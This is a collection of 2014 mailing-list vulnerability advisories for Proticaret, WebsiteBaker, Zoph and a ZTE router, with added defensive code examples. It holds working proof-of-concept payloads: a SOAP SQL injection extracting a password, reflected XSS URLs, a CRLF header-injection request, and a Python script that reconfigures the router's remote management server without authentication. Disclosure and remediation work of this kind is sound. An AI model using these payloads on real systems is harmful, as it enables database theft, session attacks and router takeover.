[FD] Proticaret E-Commerce Script v3.0 SQL Injection
Document Title:
Proticaret E-Commerce Script v3.0 SQL Injection

Release Date:
13 Nov 2014

Product & Service Introduction:
Proticaret is a free e-commerce script.

Abstract Advisory Information:
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0.

Vulnerability Disclosure Timeline:
20 Oct 2014: Contact with Vendor
20 Nov 2014: Vendor Response
June 26, 2014: Patch Released
13 Nov 2014: Public Disclosure

Discovery Status:
Published

Affected Product(s):
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0

Exploitation Technique:
Remote, Unauthenticated

Severity Level:
Critical

Technical Details & Description:
SQL Injection

Proof of Concept (PoC):

Request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1--</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>

Solution - Fix & Patch:
Apply the patch for v3.0

Security Risk:
The risk of the vulnerabilities above is estimated as critical.

Credits & Authors:
Bilgi Güvenliği Akademisi

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bi...@bga.com.tr

Copyright © 2014 | BGA

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
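An added example, not part of the advisory or of Proticaret's code, showing how the tem:Code value of the GetProductCodes request reaches SQL when concatenated, how a bound parameter neutralises the same payload, and a response-side check for the error-based oracle the SOAP fault above exposes. The Products table, the query shape and the function names are assumptions; the payload is modelled on the advisory's request.

```python
import sqlite3
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEM_NS = "http://tempuri.org/"

# Constructed request body modelled on the advisory's PoC envelope.
REQUEST = f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:tem="{TEM_NS}">
  <soapenv:Body>
    <tem:GetProductCodes>
      <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1--</tem:Code>
      <tem:StartWith>?</tem:StartWith>
    </tem:GetProductCodes>
  </soapenv:Body>
</soapenv:Envelope>"""


def extract_code(body: str) -> str:
    """Read the tem:Code parameter that the service hands on to SQL."""
    root = ET.fromstring(body)
    node = root.find(f".//{{{TEM_NS}}}GetProductCodes/{{{TEM_NS}}}Code")
    return node.text if node is not None and node.text else ""


def build_query_unsafe(code: str) -> str:
    """String concatenation (hypothetical reconstruction of the flaw): the
    single quote in `code` closes the literal and the remainder, including
    the subquery against Users, becomes part of the statement."""
    return f"SELECT Code FROM Products WHERE Code = '{code}'"


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory Products table for the safe lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (Code TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?)", [("P-100",), ("P-200",)])
    return conn


def lookup_safe(conn: sqlite3.Connection, code: str) -> list:
    """Bound parameter: the whole payload is compared as one string value,
    so it matches nothing and never reaches the parser as SQL."""
    cur = conn.execute("SELECT Code FROM Products WHERE Code = ?", (code,))
    return [row[0] for row in cur.fetchall()]


def leaks_db_error(faultstring: str) -> bool:
    """Response-side check: a SOAP fault that echoes the database driver's
    message is the oracle shown in the advisory's response; it should be
    replaced by a generic fault and logged server-side instead."""
    return "SqlException" in faultstring or "Conversion failed" in faultstring
```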
[FD] WebsiteBaker <= 2.8.3 - Multiple Vulnerabilities
MGC ALERT 2014-004

- Original release date: March 11, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)

I. VULNERABILITY
Multiple Vulnerabilities in WebsiteBaker 2.8.3

II. BACKGROUND
WebsiteBaker helps you to create the website you want: a free, easy and secure, flexible and extensible open source content management system (CMS).

III. DESCRIPTION
It is possible to inject SQL code in the variable id on the page modify.php. This bug was found using the portal without authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in WebsiteBaker that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

An input validation problem exists within WebsiteBaker which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in an HTTP Response Splitting vulnerability.

IV. PROOF OF CONCEPT

SQL Injection:
/wb/admin/pages/modify.php?page_id=1

Cross-Site Scripting (GET):
/wb/admin/admintools/tool.php?tool=captcha_control6d442<script>alert(1)</script>8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1&section_id=f953a<script>alert(1)</script>4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03<script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4<script>alert(1)</script>bdc8b3919b5

HTTP Response Splitting:
If you enter a valid user and password, you can inject malicious code into the headers, for example:

POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=admin

Response:

You can inject a new header named InjectedHeader:MaliciousCode because we inject a CRLF new line with %0d%0a%20.

V. BUSINESS IMPACT
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
WebsiteBaker <= 2.8.3

VII. SOLUTION
No news releases

VIII. REFERENCES
http://www.websitebaker.org

IX. CREDITS
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Sent to vendor
June 05, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
Manuel Garcia Cardenas
Pentester
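An added example, not part of the advisory or of WebsiteBaker, showing how the decoded `url` login parameter splits the response when it is copied into a Location header, and a redirect-target check that refuses control characters and off-site targets. The header layout, the default path and the function names are this example's assumptions; the parameter value is the one from the POST body above.

```python
from urllib.parse import unquote, urlsplit

# Constructed from the advisory's POST body: the value arrives URL-encoded.
ATTACK_URL_PARAM = "%0d%0a%20InjectedHeader:MaliciousCode"
BENIGN_URL_PARAM = "/wb/admin/"


def build_redirect_unsafe(target: str) -> list:
    """Reproduce the flaw: decode the parameter and paste it straight into
    Location, then split the raw header block on CRLF the way an HTTP parser
    does. Returns the header lines that follow the status line."""
    raw = "HTTP/1.1 302 Found\r\nLocation: " + unquote(target) + "\r\n\r\n"
    head, _, _body = raw.partition("\r\n\r\n")
    return head.split("\r\n")[1:]


def safe_redirect_target(target: str, default: str = "/wb/") -> str:
    """Decode once, then refuse anything that could break out of the header
    value (CR, LF, other control characters) or leave the site (a scheme,
    a host, or a protocol-relative //host path); otherwise fall back to a
    fixed local default."""
    value = unquote(target)
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    if not value.startswith("/") or value.startswith("//"):
        return default
    return value
```

With the attack value the unsafe builder yields an extra header line after the now-empty Location; the checked version never emits it.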
[FD] Zoph <= 0.9.1 - Multiple Vulnerabilities
MGC ALERT 2014-005

- Original release date: March 5, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)

I. VULNERABILITY
Multiple Vulnerabilities in Zoph <= 0.9.1

II. BACKGROUND
Zoph (Zoph Organizes Photos) is a web based digital image presentation and management system. In other words, a photo album. It is built with PHP, MySQL and Perl.

III. DESCRIPTION
It is possible to inject SQL code in the variables id and action on the pages group, photos and user. This bug was found using the portal with authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in Zoph that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT

SQL Injection:
/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=&_action=1'%22

Cross-Site Scripting (GET):
/zoph/php/edit_photos.php?photographer_id=3<script>alert(1)</script>
/zoph/php/edit_photos.php?album_id=2&_crumb=3<script>alert(1)</script>

V. BUSINESS IMPACT
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
Zoph <= 0.9.1

VII. SOLUTION
No news releases

VIII. REFERENCES
http://www.zoph.org/

IX. CREDITS
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Sent to vendor
June 17, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
Manuel Garcia Cardenas
Pentester
[FD] CVE-2014-8493 - ZTE ZXHN H108L Authentication Bypass
About the software
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.

Vulnerability Details
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting of their subscribers' equipment. However, editing the CWMP configuration (more specifically, sending the POST request) does not require any user authentication.

Affected Products
Device model: ZTE ZXHN H108L
Firmware Version: ZXHN H108LV4.0.0d_ZRQ_GR4

Proof of Concept

#!/usr/bin/python
import requests

acs_server = 'http://server:port'
acs_user = 'user'
acs_pass = 'pass'

# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = '/tr069'
conn_port = 7564
conn_user = 'user'
conn_pass = 'pass'

# Periodic inform parameters
active = 1
interval = 2000

payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server, 'CWMP_ACSUserName': acs_user, 'CWMP_ACSPassword': acs_pass,
           'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port,
           'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass,
           'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0'}

r = requests.post('http://192.168.1.254/Forms/access_cwmp_1', data=payload)

Impact
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also, because the router lacks CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.

Severity
Medium

References
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/

Disclosure Timeline
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure

Contact Information
Domain: https://projectzero.gr
Social: twitter.com/projectzerolabs
Contact: labs _at_ projectzero.gr
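An added example, not the router's firmware code, of the two checks the advisory reports as missing on the CWMP form POST: authentication of the POST itself (not only of the page that displays the form) and a session-bound CSRF token, which closes the cross-site JS path mentioned under Impact. The session store, token scheme, function names and status codes are this example's assumptions; the form field names are those of the advisory's payload.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Per-device secret (constructed here; a real device would persist one).
CSRF_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token derived from the session id, so a page on another origin
    cannot compute it for the victim's session."""
    return hmac.new(CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_cwmp_post(session_id: Optional[str], sessions: Dict[str, str],
                     form: Dict[str, str]) -> int:
    """Return the HTTP status a hardened /Forms/access_cwmp_1 handler would
    send. `sessions` maps session cookie -> role; `form` is the parsed body."""
    # 1. Authenticate the POST itself: restricting the GET page is not enough.
    if session_id is None or sessions.get(session_id) != "admin":
        return 401
    # 2. Require a token bound to this session; compare in constant time.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), csrf_token(session_id).encode()):
        return 403
    # 3. Only then validate and accept the CWMP fields from the advisory's payload.
    url = form.get("CWMP_ACSURL", "")
    if not (url.startswith("http://") or url.startswith("https://")):
        return 400
    if not form.get("CWMP_ConnectionRequestPort", "").isdigit():
        return 400
    return 200
```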